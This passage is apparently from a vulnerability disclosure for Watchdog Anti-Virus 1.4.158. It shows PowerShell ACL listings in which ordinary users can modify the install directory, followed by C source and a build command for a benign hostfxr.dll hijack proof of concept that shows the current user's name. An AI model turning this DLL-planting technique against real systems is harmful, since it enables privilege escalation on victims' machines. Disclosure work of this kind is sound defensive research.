2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
DESKTOP-8B89BFF\dev Allow FullControl
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0
x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80
-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICI
IOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;OICIIOID;GA;;;
CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\reports
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run.lock
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\metadata
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\settings.dat
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\session.json
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-breadcrumb1
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-breadcrumb2
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-event
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases\wsdk.fp
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases\wsdk.hdb
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\COPYING.txt
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\json-c.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libbz2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\scanner1\libclamunrar_iface.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\scanner1\libcrypto-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libcurl.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libssh2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libssl-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libxml2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\mspack.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\nghttp2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pcre2-8.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pdcurses.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pthreadVC2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
#include "windows.h"
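/**
 *
 * hostfxr.dll hijack PoC for Watchdog Anti-Virus version 1.4.158
 *
 * Benign demonstrator: once loaded, the DLL only displays the name of the
 * account the host process is running as. The condition it illustrates is the
 * inherited Modify right that BUILTIN\Users holds on the install directory
 * (see File_ACLs.txt); limiting write access there to administrators would be
 * expected to prevent an unprivileged user from placing this file.
 *
 * x86_64-w64-mingw32-g++ -masm=intel -s -w -static -shared -Wno-multichar -o hostfxr.dll main.c
 *
 * */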
#define DllImport __declspec( dllimport )
#define DllExport __declspec( dllexport )
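/*
 * Exported routine carrying the name of a hostfxr.dll export.
 *
 * Displays the name of the account the calling process runs as in a message
 * box, which is the PoC's evidence that the DLL was loaded and in which user
 * context. Takes no arguments and returns nothing.
 */
DllExport void hostfxr_main_startupinfo() {
    wchar_t username[100];
    /* Buffer capacity in characters, terminating NUL included. */
    DWORD username_len = sizeof username / sizeof username[0];

    /*
     * GetUserNameW can fail (for example when the name does not fit), and the
     * buffer contents are then not guaranteed. Fall back to a fixed label
     * instead of handing an uninitialised buffer to MessageBoxW.
     */
    const wchar_t *shown = GetUserNameW(username, &username_len)
                               ? username
                               : L"<unknown user>";

    MessageBoxW(NULL, shown, L"TEST", MB_OK | MB_ICONERROR);
}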
/*
 * DLL entry point invoked by the Windows loader.
 *
 * hinstDLL    - module handle of this DLL (unused).
 * fdwReason   - notification code; only DLL_PROCESS_ATTACH is acted on.
 * lpvReserved - loader-supplied value (unused).
 *
 * Always returns TRUE so that the load is reported as successful.
 */
BOOL WINAPI DllMain(
    IN HINSTANCE hinstDLL,
    IN DWORD fdwReason,
    IN LPVOID lpvReserved
)
{
    /* Every notification other than the initial process attach is a no-op. */
    if (fdwReason == DLL_PROCESS_ATTACH) {
        /*
         * NOTE(review): this call happens while the loader lock is held and
         * ends in MessageBoxW; Microsoft's DllMain guidance advises against
         * calling User32 functions from here because it can deadlock.
         */
        hostfxr_main_startupinfo();
    }

    return TRUE;
}